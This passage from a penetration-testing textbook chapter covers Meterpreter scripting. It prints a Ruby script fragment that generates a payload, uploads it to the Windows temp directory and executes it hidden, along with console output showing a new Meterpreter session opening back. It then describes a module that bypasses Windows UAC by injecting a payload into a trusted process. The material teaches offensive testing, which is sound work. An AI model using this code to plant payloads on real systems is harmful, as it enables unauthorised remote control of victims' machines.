background image


Chapter 16

if client.platform =~ /win32|win64/

       tempdir = client.fs.file.expand_path("%TEMP%")
       print_status("Uploading meterpreter to temp directory")
        raw = pay.generate
        exe = ::Msf::Util::EXE.to_win32pe(client.framework, raw)
       tempexe = tempdir + "\\" + filename
        tempexe.gsub!("\\\\", "\\")
       fd =, "wb")
       print_status("Executing the payload on the system")
       execute_payload = "#{tempdir}\\#{filename}"
       pid = session.sys.process.execute(execute_payload, nil, {'Hidden' => true})


Now that we have our newly created Meterpreter script, let’s launch 

Metasploit, get into Meterpreter, and execute the script:

meterpreter > 

run execute_upload -r -p 443

[*] Running payload handler
[*] Uploading meterpreter to temp directory
[*] Executing the payload on the system
[*] Sending stage (749056 bytes) to
[*] Meterpreter session 2 opened ( -> at 

Tue Nov 30 23:24:19 -0500 2010

meterpreter >

Success! We have created a Meterpreter script and successfully executed 

it to spawn a new Meterpreter shell. This is a small example of the power and 
flexibility of the Meterpreter scripting language and Ruby in general.

One important element to discuss briefly (as mentioned earlier) is the 

move to convert Meterpreter scripts to a format similar to the Metasploit 
modules. We’ll use a small demo of a module built for bypassing the Win-
dows 7 UAC. Windows Vista and later introduced a feature similar to 



UNIX- and Linux-based systems. With this feature, a user is assigned limited 
account permissions until administrative-level permissions are necessary. 
When the user needs admin rights to perform a task, a prompt appears, tell-
ing the user that admin rights are required and are being used. The ultimate 
goal of this feature is to protect against a compromise or virus infection and 
to limit exposure only to one user account.

In December 2010, Dave Kennedy and Kevin Mitnick released a new 

Meterpreter module that bypassed the Windows UAC component by inject-
ing a payload into a process that had a trusted publisher certificate and was 
considered “UAC Safe.” When injecting into the process, a DLL can be called, 
running under the context of that UAC Safe process, which then executes